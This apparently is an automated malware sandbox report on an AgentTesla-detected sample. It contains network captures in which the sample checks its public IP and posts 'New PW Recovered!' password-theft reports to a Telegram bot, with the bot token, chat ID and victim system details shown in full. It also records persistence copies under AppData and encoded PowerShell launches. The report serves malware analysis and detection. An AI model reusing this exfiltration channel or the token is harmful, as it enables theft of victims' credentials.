Mar 20, 2023 19:38:20.649841070 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.649912119 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818044901 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818145990 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818200111 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.819470882 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:26.500169039 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.500233889 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.500312090 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.501146078 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.501173973 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.574767113 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.574979067 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.578350067 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.578412056 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.578983068 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.581166029 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.581233978 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.618748903 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.620809078 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.620852947 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011068106 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011209965 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011363983 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:27.027559042 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:25.531714916 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.531794071 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:25.531898022 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.550930023 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.550990105 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.260768890 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.260880947 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.265906096 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.265940905 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.266740084 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.386190891 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.640167952 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.640227079 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808101892 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808207035 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808506012 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.810086012 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:50.165476084 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.165545940 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.165632010 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.166136980 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.166155100 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.230001926 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.230119944 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.232402086 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.232420921 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.232748985 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.234488010 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.234508991 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.282051086 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.282367945 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.282392025 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449218988 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449340105 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449481964 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.759490013 CET  49702        443        192.168.2.4      149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 20, 2023 19:38:19.534012079 CET  50911        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:19.553659916 CET  53           50911      8.8.8.8      192.168.2.4
Mar 20, 2023 19:38:19.561065912 CET  59683        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:19.580924988 CET  53           59683      8.8.8.8      192.168.2.4
Mar 20, 2023 19:38:26.481441975 CET  64167        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:26.498725891 CET  53           64167      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:25.449285030 CET  52239        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:25.469089985 CET  53           52239      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:25.475931883 CET  56807        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:25.498383999 CET  53           56807      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:47.851300955 CET  61007        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:47.876548052 CET  53           61007      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:47.912009001 CET  60686        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:47.930107117 CET  53           60686      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:50.132524967 CET  61124        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:50.152019978 CET  53           61124      8.8.8.8      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Mar 20, 2023 19:38:19.534012079 CET  192.168.2.4  8.8.8.8  0x8136    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:38:19.561065912 CET  192.168.2.4  8.8.8.8  0xdac7    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:38:26.481441975 CET  192.168.2.4  8.8.8.8  0xcca0    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:39:25.449285030 CET  192.168.2.4  8.8.8.8  0x51a8    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:39:25.475931883 CET  192.168.2.4  8.8.8.8  0x749d    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:39:47.851300955 CET  192.168.2.4  8.8.8.8  0x296d    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:39:47.912009001 CET  192.168.2.4  8.8.8.8  0x3d84    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
Mar 20, 2023 19:39:50.132524967 CET  192.168.2.4  8.8.8.8  0x85fb    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName           Address          Type                    Class        DNS over HTTPS
Mar 20, 2023 19:38:19.553659916 CET  8.8.8.8    192.168.2.4  0x8136    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:38:19.553659916 CET  8.8.8.8    192.168.2.4  0x8136    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:19.553659916 CET  8.8.8.8    192.168.2.4  0x8136    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:19.553659916 CET  8.8.8.8    192.168.2.4  0x8136    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:19.580924988 CET  8.8.8.8    192.168.2.4  0xdac7    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:38:19.580924988 CET  8.8.8.8    192.168.2.4  0xdac7    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:19.580924988 CET  8.8.8.8    192.168.2.4  0xdac7    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:19.580924988 CET  8.8.8.8    192.168.2.4  0xdac7    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:38:26.498725891 CET  8.8.8.8    192.168.2.4  0xcca0    No error (0)  api.telegram.org                  149.154.167.220  A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.469089985 CET  8.8.8.8    192.168.2.4  0x51a8    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:39:25.469089985 CET  8.8.8.8    192.168.2.4  0x51a8    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.469089985 CET  8.8.8.8    192.168.2.4  0x51a8    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.469089985 CET  8.8.8.8    192.168.2.4  0x51a8    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.498383999 CET  8.8.8.8    192.168.2.4  0x749d    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:39:25.498383999 CET  8.8.8.8    192.168.2.4  0x749d    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.498383999 CET  8.8.8.8    192.168.2.4  0x749d    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:25.498383999 CET  8.8.8.8    192.168.2.4  0x749d    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.876548052 CET  8.8.8.8    192.168.2.4  0x296d    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:39:47.876548052 CET  8.8.8.8    192.168.2.4  0x296d    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.876548052 CET  8.8.8.8    192.168.2.4  0x296d    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.876548052 CET  8.8.8.8    192.168.2.4  0x296d    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.930107117 CET  8.8.8.8    192.168.2.4  0x3d84    No error (0)  api.ipify.org     api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 19:39:47.930107117 CET  8.8.8.8    192.168.2.4  0x3d84    No error (0)  api4.ipify.org                    173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.930107117 CET  8.8.8.8    192.168.2.4  0x3d84    No error (0)  api4.ipify.org                    104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:47.930107117 CET  8.8.8.8    192.168.2.4  0x3d84    No error (0)  api4.ipify.org                    64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 19:39:50.152019978 CET  8.8.8.8    192.168.2.4  0x85fb    No error (0)  api.telegram.org                  149.154.167.220  A (IP address)          IN (0x0001)  false
• api.ipify.org
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49697 | 104.237.62.211 | 443 | C:\Users\user\Desktop\file.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 18:38:20 UTC | 0 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-03-20 18:38:20 UTC | 0 | IN | HTTP/1.1 200 OK
Content-Length: 14
Content-Type: text/plain
Date: Mon, 20 Mar 2023 18:38:20 GMT
Vary: Origin
Connection: close
2023-03-20 18:38:20 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
Data Ascii: 102.129.143.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49698 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 18:38:26 UTC | 0 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8
Host: api.telegram.org
Content-Length: 972
Expect: 100-continue
Connection: Keep-Alive
2023-03-20 18:38:26 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-03-20 18:38:26 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 35 34 35 64 35 62 35 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 35 34 35 64 35 62 35 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 32 3a 31 37 3a 35 36 0a 55 73 65 72
Data Ascii: -----------------------------8db29b545d5b5a8Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29b545d5b5a8Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 02:17:56User
2023-03-20 18:38:27 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 20 Mar 2023 18:38:26 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":315,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679337506,"document":{"file_name":"user-571345 2023-03-21 02-17-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBO2QYqCJM20estXBLwCOofputY_wWAAJYDwACJVnIUEQzGByZaiTfLwQ","file_unique_id":"AgADWA8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 02:17:56\nUser Name: user/571345\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49700 | 104.237.62.211 | 443 | C:\Users\user\Desktop\file.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 18:39:26 UTC | 2 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-03-20 18:39:26 UTC | 2 | IN | HTTP/1.1 200 OK
Content-Length: 14
Content-Type: text/plain
Date: Mon, 20 Mar 2023 18:39:26 GMT
Vary: Origin
Connection: close
2023-03-20 18:39:26 UTC | 2 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
Data Ascii: 102.129.143.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49702 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 18:39:50 UTC | 2 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53
Host: api.telegram.org
Content-Length: 972
Expect: 100-continue
Connection: Keep-Alive
2023-03-20 18:39:50 UTC | 3 | IN | HTTP/1.1 100 Continue
2023-03-20 18:39:50 UTC | 3 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 62 61 30 32 63 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 62 61 30 32 63 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 30 3a 35 39 3a 34 38 0a 55 73 65 72
Data Ascii: -----------------------------8db298ba02c5c53Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db298ba02c5c53Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 20:59:48User
2023-03-20 18:39:50 UTC | 4 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 20 Mar 2023 18:39:50 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":316,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679337590,"document":{"file_name":"user-571345 2023-03-20 21-39-46.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBPGQYqHZ71GcGR33wIy_l8julCQfJAAJZDwACJVnIUAyROyqbjiMmLwQ","file_unique_id":"AgADWQ8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 20:59:48\nUser Name: user/571345\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}



Target ID: 0
Start time: 19:37:41
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x680000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 19:37:49
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 2
Start time: 19:37:49
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 19:38:14
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x120000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 4
Start time: 19:38:15
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x810000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 5
Start time: 19:38:26
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
Imagebase: 0xb0000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 36%, ReversingLabs
• Detection: 44%, Virustotal
Reputation: low

Target ID: 8
Start time: 19:38:35
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Imagebase: 0xff0000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 36%, ReversingLabs
                                                                                                                              Reputation:low

                                                                                                                              Target ID:9
                                                                                                                              Start time:19:38:45
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                                                                                                              Imagebase:0xf20000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:low

                                                                                                                              Target ID:10
                                                                                                                              Start time:19:38:48
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:430592 bytes
                                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:high

                                                                                                                              Target ID:11
                                                                                                                              Start time:19:38:48
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7c72c0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Target ID:12
                                                                                                                              Start time:19:38:55
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                                                              Imagebase:0x840000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:low

                                                                                                                              Target ID:13
                                                                                                                              Start time:19:39:16
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:430592 bytes
                                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:high

                                                                                                                              Target ID:14
                                                                                                                              Start time:19:39:16
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7c72c0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              Target ID:15
                                                                                                                              Start time:19:39:21
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Imagebase:0x670000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                                              Target ID:19
                                                                                                                              Start time:19:39:45
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Wow64 process (32bit):true
